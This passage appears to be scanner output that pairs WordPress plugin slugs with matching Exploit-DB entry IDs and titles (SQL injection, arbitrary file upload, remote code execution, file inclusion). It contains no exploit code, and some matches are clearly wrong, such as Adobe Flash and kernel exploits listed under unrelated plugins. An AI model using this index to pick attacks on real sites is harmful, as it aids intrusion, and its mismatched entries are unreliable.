- [M] EDB-ID: 39591 "WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion"
- [I] cac-featured-content
- [I] candidate-application-form
- [M] EDB-ID: 37754 "WordPress Plugin Candidate Application Form 1.0 - Arbitrary File Download"
- [I] catalog
- [M] EDB-ID: 25724 "WordPress Plugin Spider Catalog 1.4.6 - Multiple Vulnerabilities"
- [M] EDB-ID: 38639 "WordPress Plugin miniBB - SQL Injection / Multiple Cross-Site Scripting Vulnerabilities"
- [I] category-grid-view-gallery
- [M] EDB-ID: 38625 "WordPress Plugin Category Grid View Gallery - 'ID' Cross-Site Scripting"
- [I] category-list-portfolio-page
- [I] cevhershare
- [M] EDB-ID: 17891 "WordPress Plugin CevherShare 2.0 - SQL Injection"
- [I] cforms
- [M] EDB-ID: 34946 "WordPress Plugin cformsII 11.5/13.1 - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities"
- [I] cforms2
- [M] EDB-ID: 35879 "WordPress Plugin Cforms 14.7 - Remote Code Execution"
- [I] chenpress
- [M] EDB-ID: 37522 "WordPress Plugin chenpress - Arbitrary File Upload"
- [I] church-admin
- [M] EDB-ID: 37483 "WordPress Plugin church_admin - 'id' Cross-Site Scripting"
- [I] cimy-counter
- [M] EDB-ID: 14057 "WordPress Plugin Cimy Counter - Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting"
- [M] EDB-ID: 34195 "WordPress Plugin Cimy Counter 0.9.4 - HTTP Response Splitting / Cross-Site Scripting"
- [I] clickdesk-live-support-chat
- [M] EDB-ID: 36338 "WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting"
- [I] cloudsafe365-for-wp
- [M] EDB-ID: 37681 "WordPress Plugin Cloudsafe365 - 'file' Remote File Disclosure"
- [I] cm-download-manager
- [M] EDB-ID: 35324 "WordPress Plugin CM Download Manager 2.0.0 - Code Injection"
- [I] cms-pack
- [I] cnhk-slideshow
- [M] EDB-ID: 39190 "WordPress Plugin cnhk-Slideshow - Arbitrary File Upload"
- [I] comicpress-manager
- [M] EDB-ID: 35393 "WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Cross-Site Scripting"
- [I] comment-rating
- [M] EDB-ID: 16221 "WordPress Plugin Comment Rating 2.9.23 - Multiple Vulnerabilities"
- [M] EDB-ID: 24552 "WordPress Plugin Comment Rating 2.9.32 - Multiple Vulnerabilities"
- [M] EDB-ID: 36487 "WordPress Plugin Comment Rating 2.9.20 - 'path' Cross-Site Scripting"
- [I] community-events
- [M] EDB-ID: 17798 "WordPress Plugin Community Events 1.2.1 - SQL Injection"
- [I] complete-gallery-manager
- [M] EDB-ID: 28377 "WordPress Plugin Complete Gallery Manager 3.3.3 - Arbitrary File Upload"
- [I] contact-form-generator
- [M] EDB-ID: 38086 "WordPress Plugin Contact Form Generator 2.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities"
- [I] contact-form-wordpress
- [M] EDB-ID: 17980 "WordPress Plugin Contact Form 2.7.5 - SQL Injection"
- [I] contus-hd-flv-player
- [M] EDB-ID: 17678 "WordPress Plugin Contus HD FLV Player 1.3 - SQL Injection"
- [M] EDB-ID: 37377 "WordPress Plugin HD FLV Player - 'uploadVideo.php' Arbitrary File Upload"
- [I] contus-video-gallery
- [M] EDB-ID: 34161 "WordPress Plugin Video Gallery 2.5 - Multiple Vulnerabilities"
- [I] contus-video-galleryversion-10
- [M] EDB-ID: 37373 "WordPress Plugin Contus Video Gallery - 'upload1.php' Arbitrary File Upload"
- [I] copyright-licensing-tools
- [M] EDB-ID: 17749 "WordPress Plugin iCopyright(R) Article Tools 1.1.4 - SQL Injection"
- [I] count-per-day
- [M] EDB-ID: 17857 "WordPress Plugin Count per Day 2.17 - SQL Injection"
- [M] EDB-ID: 18355 "WordPress Plugin Count Per Day - Multiple Vulnerabilities"
- [M] EDB-ID: 20862 "WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting"
- [I] couponer
- [M] EDB-ID: 17759 "WordPress Plugin Couponer 1.2 - SQL Injection"
- [I] cp-polls
- [M] EDB-ID: 39513 "WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities"
- [I] cp-reservation-calendar
- [M] EDB-ID: 38187 "WordPress Plugin CP Reservation Calendar 1.1.6 - SQL Injection"
- [I] cpl
- [M] EDB-ID: 11458 "WordPress Plugin Copperleaf Photolog 0.16 - SQL Injection"
- [I] crawlrate-tracker
- [M] EDB-ID: 17755 "WordPress Plugin Crawl Rate Tracker 2.0.2 - SQL Injection"
- [I] crayon-syntax-highlighter
- [M] EDB-ID: 37946 "WordPress Plugin Crayon Syntax Highlighter - 'wp_load' Remote File Inclusion"
- [I] custom-background
- [M] EDB-ID: 39135 "WordPress Theme Felici - 'Uploadify.php' Arbitrary File Upload"
- [I] custom-content-type-manager
- [M] EDB-ID: 19058 "WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload"
- [I] custom-tables
- [M] EDB-ID: 37482 "WordPress Plugin custom tables - 'key' Cross-Site Scripting"
- [I] cysteme-finder
- [M] EDB-ID: 40295 "WordPress Plugin CYSTEME Finder 1.3 - Arbitrary File Disclosure/Arbitrary File Upload"
- [I] daily-maui-photo-widget
- [M] EDB-ID: 35673 "WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities"
- [I] db-backup
- [M] EDB-ID: 35378 "WordPress Plugin DB Backup - Arbitrary File Download"
- [I] disclosure-policy-plugin
- [M] EDB-ID: 17865 "WordPress Plugin Disclosure Policy 1.0 - Remote File Inclusion"
- [I] dm-albums
- [M] EDB-ID: 9043 "Adobe Flash Selection.SetSelection - Use-After-Free"
- [M] EDB-ID: 9048 "Adobe Flash TextField.replaceText - Use-After-Free"
- [I] dmsguestbook
- [I] downloads-manager
- [M] EDB-ID: 6127 "Pixel Studio 2.17 - Denial of Service (PoC)"
- [I] dp-thumbnail
- [I] drag-drop-file-uploader
- [M] EDB-ID: 19057 "WordPress Plugin drag and drop file upload 0.1 - Arbitrary File Upload"
- [I] dukapress
- [M] EDB-ID: 35346 "WordPress Plugin DukaPress 2.5.2 - Directory Traversal"
- [I] duplicator v1.3.0
- [M] EDB-ID: 38676 "WordPress Plugin Duplicator - Cross-Site Scripting"
- [M] EDB-ID: 44288 "WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting"
- [I] dzs-videogallery
- [M] EDB-ID: 29834 "WordPress Plugin dzs-videogallery - Arbitrary File Upload"
- [M] EDB-ID: 30063 "WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure"
- [M] EDB-ID: 39250 "WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection"
- [M] EDB-ID: 39553 "WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities"
- [I] dzs-zoomsounds
- [M] EDB-ID: 37166 "WordPress Plugin dzs-zoomsounds 2.0 - Arbitrary File Upload"
- [I] easy-contact-form-lite
- [M] EDB-ID: 17680 "WordPress Plugin Easy Contact Form Lite 1.0.7 - SQL Injection"
- [I] easy-contact-forms-exporter
- [M] EDB-ID: 19013 "WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure"
- [I] ebook-download
- [M] EDB-ID: 39575 "WordPress Plugin eBook Download 1.1 - Directory Traversal"
- [I] eco-annu
- [M] EDB-ID: 38019 "WordPress Plugin Eco-annu - 'eid' SQL Injection"
- [I] editormonkey
- [M] EDB-ID: 17284 "WordPress Plugin EditorMonkey 2.5 - 'FCKeditor' Arbitrary File Upload"
- [I] email-newsletter
- [M] EDB-ID: 37356 "WordPress Plugin Email NewsLetter 8.0 - 'option' Information Disclosure"
- [I] evarisk
- [M] EDB-ID: 17738 "WordPress Plugin Evarisk 5.1.3.6 - SQL Injection"
- [M] EDB-ID: 37399 "WordPress Plugin Evarisk - 'uploadPhotoApres.php' Arbitrary File Upload"
- [I] event-registration
- [M] EDB-ID: 17751 "WordPress Plugin Event Registration 5.4.3 - SQL Injection"
- [I] eventify
- [M] EDB-ID: 17794 "WordPress Plugin Eventify - Simple Events 1.7.f SQL Injection"
- [I] extend-wordpress
- [I] facebook-opengraph-meta-plugin
- [M] EDB-ID: 17773 "WordPress Plugin Facebook Opengraph Meta 1.0 - SQL Injection"
- [I] fbgorilla
- [M] EDB-ID: 39283 "WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection"
- [I] fbpromotions
- [M] EDB-ID: 17737 "WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection"
- [I] fcchat
- [M] EDB-ID: 35289 "WordPress Plugin FCChat Widget 2.1.7 - 'path' Cross-Site Scripting"
- [M] EDB-ID: 37370 "WordPress Plugin FCChat Widget 2.2.x - 'upload.php' Arbitrary File Upload"
- [I] feature-slideshow
- [M] EDB-ID: 35285 "WordPress Plugin Feature Slideshow 1.0.6 - 'src' Cross-Site Scripting"
- [I] featurific-for-wordpress
- [M] EDB-ID: 36339 "WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting"
- [I] feed
- [M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
- [I] feedlist
- [M] EDB-ID: 34973 "WordPress Plugin FeedList 2.61.01 - 'handler_image.php' Cross-Site Scripting"
- [I] feedweb
- [M] EDB-ID: 38414 "WordPress Plugin Feedweb - 'wp_post_id' Cross-Site Scripting"
- [I] fgallery
- [M] EDB-ID: 4993 "GitList 0.6.0 - Argument Injection (Metasploit)"
- [I] file-groups
- [M] EDB-ID: 17677 "WordPress Plugin File Groups 1.1.2 - SQL Injection"
- [I] filedownload
- [M] EDB-ID: 17858 "WordPress Plugin Filedownload 0.1 - 'download.php' Remote File Disclosure"
- [I] finder
- [M] EDB-ID: 37677 "WordPress Plugin Finder - 'order' Cross-Site Scripting"
- [I] firestats
- [M] EDB-ID: 14308 "WordPress Plugin Firestats - Remote Configuration File Download"
- [M] EDB-ID: 33367 "WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (1)"
- [M] EDB-ID: 33368 "WordPress Plugin Firestats 1.0.2 - Multiple Cross-Site Scripting / Authentication Bypass Vulnerabilities (2)"
- [I] flash-album-gallery
- [M] EDB-ID: 16947 "WordPress Plugin GRAND Flash Album Gallery 0.55 - Multiple Vulnerabilities"
- [M] EDB-ID: 36383 "WordPress Plugin flash-album-gallery - 'facebook.php' Cross-Site Scripting"
- [M] EDB-ID: 36434 "WordPress Plugin GRAND FlAGallery 1.57 - 'flagshow.php' Cross-Site Scripting"
- [M] EDB-ID: 36444 "WordPress Plugin flash-album-gallery - 'flagshow.php' Cross-Site Scripting"
- [I] flexible-custom-post-type
- [M] EDB-ID: 36317 "WordPress Plugin Flexible Custom Post Type - 'id' Cross-Site Scripting"
- [I] flipbook
- [M] EDB-ID: 37452 "WordPress Plugin Flip Book - 'PHP.php' Arbitrary File Upload"
- [I] font-uploader
- [M] EDB-ID: 18994 "WordPress Plugin Font Uploader 1.2.4 - Arbitrary File Upload"
- [I] formcraft
- [M] EDB-ID: 30002 "WordPress Plugin Formcraft - SQL Injection"
- [I] forum-server
- [M] EDB-ID: 16235 "WordPress Plugin Forum Server 1.6.5 - SQL Injection"
- [M] EDB-ID: 17828 "WordPress Plugin Forum Server 1.7 - SQL Injection"
- [I] foxypress
- [M] EDB-ID: 18991 "WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload"
- [M] EDB-ID: 22374 "WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities"
- [I] front-end-upload
- [M] EDB-ID: 19008 "WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload"
- [I] front-file-manager
- [M] EDB-ID: 19012 "WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload"
- [I] fs-real-estate-plugin
- [M] EDB-ID: 22071 "WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection"
- [I] gallery-images
- [M] EDB-ID: 34524 "WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection"
- [M] EDB-ID: 39807 "WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities"
- [I] gallery-plugin
- [M] EDB-ID: 18998 "WordPress Plugin Gallery 3.06 - Arbitrary File Upload"
- [M] EDB-ID: 38209 "WordPress Plugin Gallery - 'filename_1' Arbitrary File Access"
- [I] gd-star-rating
- [M] EDB-ID: 17973 "WordPress Plugin GD Star Rating 1.9.10 - SQL Injection"
- [M] EDB-ID: 35373 "WordPress Plugin GD Star Rating 1.9.7 - 'wpfn' Cross-Site Scripting"
- [M] EDB-ID: 35835 "WordPress Plugin GD Star Rating - 'votes' SQL Injection"
- [I] gift-voucher
- [M] EDB-ID: 45255 "WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL Injection"
- [I] global-content-blocks
- [M] EDB-ID: 17687 "WordPress Plugin Global Content Blocks 1.2 - SQL Injection"
- [I] global-flash-galleries
- [M] EDB-ID: 39059 "WordPress Plugin Global Flash Gallery - 'swfupload.php' Arbitrary File Upload"
- [I] google-document-embedder
- [M] EDB-ID: 35371 "WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection"
- [M] EDB-ID: 35447 "WordPress Plugin Google Document Embedder 2.5.16 - 'mysql_real_escpae_string' Bypass SQL Injection"
- [I] google-mp3-audio-player
- [M] EDB-ID: 35460 "WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download"
- [I] gracemedia-media-player
- [M] EDB-ID: 46537 "WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion"
- [I] grapefile
- [M] EDB-ID: 17760 "WordPress Plugin grapefile 1.1 - Arbitrary File Upload"
- [I] gwolle-gb
- [M] EDB-ID: 38861 "WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion"
- [I] hb-audio-gallery-lite
- [M] EDB-ID: 39589 "WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download"
- [I] hd-webplayer
- [M] EDB-ID: 20918 "WordPress Plugin HD Webplayer 1.1 - SQL Injection"
- [I] history-collection
- [M] EDB-ID: 37254 "WordPress Plugin History Collection 1.1.1 - Arbitrary File Download"
- [I] hitasoft_player
- [M] EDB-ID: 38012 "WordPress Plugin FLV Player - 'id' SQL Injection"
- [I] html5avmanager
- [M] EDB-ID: 18990 "WordPress Plugin HTML5 AV Manager 0.2.7 - Arbitrary File Upload"
- [I] i-dump-iphone-to-wordpress-photo-uploader
- [M] EDB-ID: 36691 "WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload"
- [I] iframe-admin-pages
- [M] EDB-ID: 37179 "WordPress Plugin iFrame Admin Pages 0.1 - 'main_page.php' Cross-Site Scripting"
- [I] igit-posts-slider-widget
- [M] EDB-ID: 35392 "WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Cross-Site Scripting"
- [I] image-export
- [M] EDB-ID: 39584 "WordPress Plugin Image Export 1.1.0 - Arbitrary File Disclosure"
- [I] image-gallery-with-slideshow
- [M] EDB-ID: 17761 "WordPress Plugin image Gallery with Slideshow 1.5 - Multiple Vulnerabilities"
- [I] imdb-widget
- [M] EDB-ID: 39621 "WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion"
- [I] inboundio-marketing
- [M] EDB-ID: 36478 "WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload"
- [I] indeed-membership-pro
- [I] inline-gallery
- [M] EDB-ID: 35418 "WordPress Plugin Inline Gallery 0.3.9 - 'do' Cross-Site Scripting"
- [I] insert-php
- [M] EDB-ID: 41308 "WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection"
- [I] invit0r
- [M] EDB-ID: 37403 "WordPress Plugin Invit0r - 'ofc_upload_image.php' Arbitrary File Upload"
- [I] ip-logger
- [M] EDB-ID: 17673 "WordPress Plugin IP-Logger 3.0 - SQL Injection"
- [I] is-human
- [M] EDB-ID: 17299 "WordPress Plugin Is-human 1.4.2 - Remote Command Execution"
- [I] islidex
- [I] iwant-one-ihave-one
- [M] EDB-ID: 16236 "WordPress Plugin IWantOneButton 3.0.1 - Multiple Vulnerabilities"
- [I] jetpack v6.8.1
- [M] EDB-ID: 18126 "WordPress Plugin jetpack - 'sharedaddy.php' ID SQL Injection"
- [I] jibu-pro
- [M] EDB-ID: 45305 "WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting"
- [I] joliprint
- [M] EDB-ID: 37176 "WordPress Plugin PDF & Print Button Joliprint 1.3.0 - Multiple Cross-Site Scripting Vulnerabilities"
- [I] jquery-mega-menu
- [M] EDB-ID: 16250 "WordPress Plugin jQuery Mega Menu 1.0 - Local File Inclusion"
- [I] jrss-widget
- [M] EDB-ID: 34977 "WordPress Plugin jRSS Widget 1.1.1 - 'url' Information Disclosure"
- [I] js-appointment
- [M] EDB-ID: 17724 "WordPress Plugin Js-appointment 1.5 - SQL Injection"
- [I] js_composer
- [I] jtrt-responsive-tables
- [M] EDB-ID: 43110 "WordPress Plugin JTRT Responsive Tables 4.1 - SQL Injection"
- [I] kino-gallery
- [I] kish-guest-posting
- [I] kittycatfish
- [M] EDB-ID: 41919 "WordPress Plugin KittyCatfish 2.2 - SQL Injection"
- [I] knews
- [M] EDB-ID: 37484 "WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting"
- [I] knr-author-list-widget
- [M] EDB-ID: 17791 "WordPress Plugin KNR Author List Widget 2.0.0 - SQL Injection"
- [I] lanoba-social-plugin
- [M] EDB-ID: 36326 "WordPress Plugin Lanoba Social 1.0 - 'action' Cross-Site Scripting"
- [I] lazy-content-slider
- [M] EDB-ID: 40070 "WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)"
- [I] lazy-seo
- [M] EDB-ID: 28452 "WordPress Plugin Lazy SEO 1.1.9 - Arbitrary File Upload"
- [I] lazyest-gallery
- [M] EDB-ID: 35435 "WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Cross-Site Scripting"
- [I] lb-mixed-slideshow
- [M] EDB-ID: 37418 "WordPress Plugin LB Mixed Slideshow - 'upload.php' Arbitrary File Upload"
- [I] leaguemanager
- [M] EDB-ID: 24789 "WordPress Plugin LeagueManager 3.8 - SQL Injection"
- [I] leenkme
- [I] levelfourstorefront
- [M] EDB-ID: 38158 "WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php? reqID' SQL Injection"
- [M] EDB-ID: 38159 "WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID' SQL Injection"
- [M] EDB-ID: 38160 "WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID' SQL Injection"
- [I] like-dislike-counter-for-posts-pages-and-comments
- [M] EDB-ID: 34553 "WordPress Plugin Like Dislike Counter 1.2.3 - SQL Injection"
- [I] link-library
- [M] EDB-ID: 17887 "WordPress Plugin Link Library 5.2.1 - SQL Injection"
- [I] lisl-last-image-slider
- [I] livesig
- [M] EDB-ID: 17864 "WordPress Plugin Livesig 0.4 - Remote File Inclusion"
- [I] localize-my-post
- [M] EDB-ID: 45439 "WordPress Plugin Localize My Post 1.0 - Local File Inclusion"
- [I] mac-dock-gallery
- [M] EDB-ID: 19056 "WordPress Plugin Mac Photo Gallery 2.7 - Arbitrary File Upload"
- [I] madebymilk
- [M] EDB-ID: 38041 "WordPress Theme Madebymilk - 'id' SQL Injection"
- [I] mail-masta
- [M] EDB-ID: 40290 "WordPress Plugin Mail Masta 1.0 - Local File Inclusion"
- [M] EDB-ID: 41438 "WordPress Plugin Mail Masta 1.0 - SQL Injection"
- [I] mailz
- [M] EDB-ID: 17866 "WordPress Plugin Mailing List 1.3.2 - Remote File Inclusion"
- [M] EDB-ID: 18276 "WordPress Plugin Mailing List - Arbitrary File Download"
- [I] media-library-categories
- [M] EDB-ID: 17628 "WordPress Plugin Media Library Categories 1.0.6 - SQL Injection"
- [I] meenews
- [M] EDB-ID: 36340 "WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting"
- [I] membership-simplified-for-oap-members-only
- [M] EDB-ID: 41622 "Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download"
- [I] mingle-forum
- [M] EDB-ID: 15943 "WordPress Plugin mingle forum 1.0.26 - Multiple Vulnerabilities"
- [M] EDB-ID: 17894 "WordPress Plugin Mingle Forum 1.0.31 - SQL Injection"
- [I] mm-forms-community
- [M] EDB-ID: 17725 "WordPress Plugin MM Forms Community 1.2.3 - SQL Injection"
- [M] EDB-ID: 18997 "WordPress Plugin MM Forms Community 2.2.6 - Arbitrary File Upload"
- [I] monsters-editor-10-for-wp-super-edit
- [M] EDB-ID: 37654 "WordPress Plugin Monsters Editor for WP Super Edit - Arbitrary File Upload"
- [I] mukioplayer-for-wordpress
- [M] EDB-ID: 38755 "WordPress Plugin mukioplayer4wp - 'cid' SQL Injection"
- [I] myflash
- [M] EDB-ID: 3828 "Microsoft Windows Kernel - 'NtGdiStretchBlt' Pool Buffer Overflow (MS15-097)"
- [I] mystat
- [M] EDB-ID: 17740 "WordPress Plugin mySTAT 2.6 - SQL Injection"
- [I] nextgen-gallery
- [M] EDB-ID: 12098 "WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting"
- [M] EDB-ID: 38178 "WordPress Plugin NextGEN Gallery - 'test-head' Cross-Site Scripting"
- [M] EDB-ID: 39100 "WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal"
- [I] nextgen-smooth-gallery
- [M] EDB-ID: 14541 "WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection"
- [I] ocim-mp3
- [M] EDB-ID: 39498 "WordPress Plugin Ocim MP3 - SQL Injection"
- [I] odihost-newsletter-plugin
- [M] EDB-ID: 17681 "WordPress Plugin OdiHost NewsLetter 1.0 - SQL Injection"
- [I] old-post-spinner
- [M] EDB-ID: 16251 "WordPress Plugin OPS Old Post Spinner 2.2.1 - Local File Inclusion"
- [I] olimometer
- [M] EDB-ID: 40804 "WordPress Plugin Olimometer 2.56 - SQL Injection"
- [I] omni-secure-files
- [M] EDB-ID: 19009 "WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload"
- [I] oqey-gallery
- [M] EDB-ID: 17779 "WordPress Plugin oQey Gallery 0.4.8 - SQL Injection"
- [M] EDB-ID: 35288 "WordPress Plugin oQey-Gallery 0.2 - 'tbpv_domain' Cross-Site Scripting"
- [I] oqey-headers
- [M] EDB-ID: 17730 "WordPress Plugin oQey Headers 0.3 - SQL Injection"
- [I] page-flip-image-gallery
- [M] EDB-ID: 30084 "WordPress Plugin page-flip-image-gallery - Arbitrary File Upload"
- [M] EDB-ID: 7543 "Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure"
- [I] paid-downloads
- [M] EDB-ID: 17797 "WordPress Plugin Paid Downloads 2.01 - SQL Injection"
- [M] EDB-ID: 36135 "WordPress Plugin Auctions 1.8.8 - 'wpa_id' SQL Injection"
- [I] participants-database
- [I] pay-with-tweet.php
- [M] EDB-ID: 18330 "WordPress Plugin Pay with Tweet 1.1 - Multiple Vulnerabilities"
- [I] paypal-currency-converter-basic-for-woocommerce
- [M] EDB-ID: 37253 "WordPress Plugin Paypal Currency Converter Basic For WooCommerce - File Read"
- [I] peugeot-music-plugin
- [M] EDB-ID: 44737 "WordPress Plugin Peugeot Music - Arbitrary File Upload"
- [I] photocart-link
- [M] EDB-ID: 39623 "WordPress Plugin Photocart Link 1.6 - Local File Inclusion"
- [I] photoracer
- [M] EDB-ID: 17720 "WordPress Plugin Photoracer 1.0 - SQL Injection"
- [M] EDB-ID: 17731 "WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities"
- [M] EDB-ID: 8961 "WordPress Plugin Photoracer 1.0 - 'id' SQL Injection"
- [I] photosmash-galleries
- [M] EDB-ID: 35429 "WordPress Plugin PhotoSmash Galleries 1.0.x - 'action' Cross-Site Scripting"
- [M] EDB-ID: 38872 "WordPress Plugin PhotoSmash Galleries - 'bwbps-uploader.php' Arbitrary File Upload"
- [I] php_speedy_wp
- [I] phpfreechat
- [M] EDB-ID: 37485 "WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting"
- [I] pica-photo-gallery
- [M] EDB-ID: 19016 "WordPress Plugin PICA Photo Gallery 1.0 - Remote File Disclosure"
- [M] EDB-ID: 19055 "WordPress Plugin Pica Photo Gallery 1.0 - Arbitrary File Upload"
- [I] pictpress
- [M] EDB-ID: 4695 "Karaoke Video Creator 2.2.8 - Denial of Service"
- [I] picturesurf-gallery
- [M] EDB-ID: 37371 "WordPress Plugin Picturesurf Gallery - 'upload.php' Arbitrary File Upload"
- [I] placester
- [M] EDB-ID: 35562 "WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting"
- [I] player
- [M] EDB-ID: 38458 "WordPress Plugin Spider Video Player - 'theme' SQL Injection"
- [I] plg_novana
- [I] plugin-dir
- [M] EDB-ID: 22853 "WordPress Plugin Facebook Survey 1.0 - SQL Injection"
- [I] plugin-newsletter
- [M] EDB-ID: 19018 "WordPress Plugin NewsLetter 1.5 - Remote File Disclosure"
- [I] podpress
- [M] EDB-ID: 38376 "WordPress Plugin podPress - 'playerID' Cross-Site Scripting"
- [I] portable-phpmyadmin
- [M] EDB-ID: 23356 "WordPress Plugin Portable phpMyAdmin - Authentication Bypass"
- [I] post-highlights
- [M] EDB-ID: 17790 "WordPress Plugin post highlights 2.2 - SQL Injection"
- [I] post-recommendations-for-wordpress
- [M] EDB-ID: 37506 "WordPress Plugin Post Recommendations - 'abspath' Remote File Inclusion"
- [I] powerhouse-museum-collection-image-grid
- [M] EDB-ID: 35287 "WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Cross-Site Scripting"
- [I] premium_gallery_manager
- [I] pretty-link
- [M] EDB-ID: 36233 "WordPress Plugin Pretty Link 1.4.56 - Multiple Cross-Site Scripting Vulnerabilities"
- [M] EDB-ID: 36408 "WordPress Plugin Pretty Link 1.5.2 - 'pretty-bar.php' Cross-Site Scripting"
- [M] EDB-ID: 37196 "WordPress Plugin Pretty Link Lite 1.5.2 - SQL Injection / Cross-Site Scripting"
- [M] EDB-ID: 38324 "WordPress Plugin Pretty Link - Cross-Site Scripting"
- [I] profiles
- [M] EDB-ID: 17739 "WordPress Plugin Profiles 2.0 RC1 - SQL Injection"
- [I] proplayer
- [M] EDB-ID: 17616 "WordPress Plugin ProPlayer 4.7.7 - SQL Injection"
- [M] EDB-ID: 25605 "WordPress Plugin ProPlayer 4.7.9.1 - SQL Injection"
- [I] pure-html
- [M] EDB-ID: 17758 "WordPress Plugin PureHTML 1.0.0 - SQL Injection"
- [I] pw-vc-box-post-layout
- [I] pw-vc-news-ticker-post-layout
- [I] q-and-a-focus-plus-faq
- [M] EDB-ID: 39806 "WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities"
- [I] radykal-fancy-gallery
- [M] EDB-ID: 19398 "WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload"
- [I] rating-widget
- [I] rb-agency
- [M] EDB-ID: 40333 "WordPress Plugin RB Agency 2.4.7 - Local File Disclosure"
- [I] rbxgallery
- [M] EDB-ID: 19019 "WordPress Plugin RBX Gallery 2.1 - Arbitrary File Upload"
- [I] real3d-flipbook
- [M] EDB-ID: 40055 "WordPress Plugin Real3D FlipBook - Multiple Vulnerabilities"
- [I] really-easy-slider
- [I] really-simple-guest-post
- [M] EDB-ID: 37209 "WordPress Plugin Really Simple Guest Post 1.0.6 - Local File Inclusion"
- [I] recent-backups
- [M] EDB-ID: 37752 "WordPress Plugin Recent Backups 0.7 - Arbitrary File Download"
- [I] recipe
- [M] EDB-ID: 31228 "WordPress Plugin Recipes Blog - 'id' SQL Injection"
- [I] reciply
- [M] EDB-ID: 35265 "WordPress Plugin Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload"
- [I] reflex-gallery
- [M] EDB-ID: 36374 "WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload"
- [I] rekt-slideshow
- [I] related-sites
- [M] EDB-ID: 9054 "Adobe Flash TextField.tabIndex Setter - Use-After-Free"
- [I] relocate-upload
- [M] EDB-ID: 17869 "WordPress Plugin Relocate Upload 0.14 - Remote File Inclusion"
- [I] rent-a-car
- [I] resume-submissions-job-postings
- [M] EDB-ID: 19791 "WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload"
- [I] revslider
- [I] rich-widget
- [M] EDB-ID: 37653 "WordPress Plugin Rich Widget - Arbitrary File Upload"
- [I] ripe-hd-player
- [M] EDB-ID: 24229 "WordPress Plugin Ripe HD FLV Player - SQL Injection"
- [I] robotcpa
- [M] EDB-ID: 37252 "WordPress Plugin RobotCPA V5 - Local File Inclusion"
- [I] rss-feed-reader
- [M] EDB-ID: 35261 "WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Cross-Site Scripting"
- [I] s3bubble-amazon-s3-html-5-video-with-adverts
- [M] EDB-ID: 37494 "WordPress Plugin S3Bubble Cloud Video With Adverts & Analytics 0.7 - Arbitrary File Download"
- [I] scormcloud
- [M] EDB-ID: 17793 "WordPress Plugin SCORM Cloud 1.0.6.6 - SQL Injection"
- [I] se-html5-album-audio-player
- [M] EDB-ID: 37274 "WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal"
- [I] search-autocomplete
